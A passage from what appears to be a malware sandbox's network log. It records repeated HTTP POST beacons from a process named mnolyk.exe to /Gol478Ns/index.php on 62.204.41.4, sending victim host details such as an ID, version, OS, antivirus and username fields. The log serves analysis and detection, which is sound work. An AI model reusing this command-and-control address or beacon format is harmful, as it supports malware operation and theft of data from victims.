                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:19.609977961 CET | 746 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      294 | 192.168.2.7 | 50021 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:19.783406973 CET | 747 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:19.847878933 CET | 747 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      295 | 192.168.2.7 | 50022 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:20.029901028 CET | 748 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:20.095199108 CET | 748 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      296 | 192.168.2.7 | 50023 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:20.267374039 CET | 749 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:20.332250118 CET | 749 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      297 | 192.168.2.7 | 50024 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:20.506098032 CET | 750 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:20.569529057 CET | 750 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      298 | 192.168.2.7 | 50025 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:20.761388063 CET | 751 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:20.828367949 CET | 751 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      299 | 192.168.2.7 | 50026 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:21.007242918 CET | 752 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:21.075069904 CET | 752 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      3 | 192.168.2.7 | 49727 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:35:56.731344938 CET | 434 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:35:56.798099041 CET | 435 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:35:56 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      30 | 192.168.2.7 | 49754 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:04.905747890 CET | 462 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:04.969631910 CET | 462 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      300 | 192.168.2.7 | 50027 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:21.251923084 CET | 753 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:21.314766884 CET | 753 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      301 | 192.168.2.7 | 50028 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:21.493237019 CET | 754 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:21.558015108 CET | 754 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      302 | 192.168.2.7 | 50029 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:21.731774092 CET | 755 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:21.796478033 CET | 755 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      303 | 192.168.2.7 | 50030 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:21.969698906 CET | 756 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:22.035923004 CET | 756 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      304 | 192.168.2.7 | 50031 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:22.219104052 CET | 757 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:22.288219929 CET | 757 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      305 | 192.168.2.7 | 50032 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:22.465404987 CET | 758 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:22.530270100 CET | 758 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      306 | 192.168.2.7 | 50033 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:22.700596094 CET | 759 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:22.764436960 CET | 759 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      307 | 192.168.2.7 | 50034 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:22.947073936 CET | 760 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:23.012310982 CET | 760 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      308 | 192.168.2.7 | 50035 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:23.185231924 CET | 761 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:23.251290083 CET | 761 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      309 | 192.168.2.7 | 50036 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:23.421958923 CET | 762 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:23.486078978 CET | 762 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      31 | 192.168.2.7 | 49755 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:05.145544052 CET | 463 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
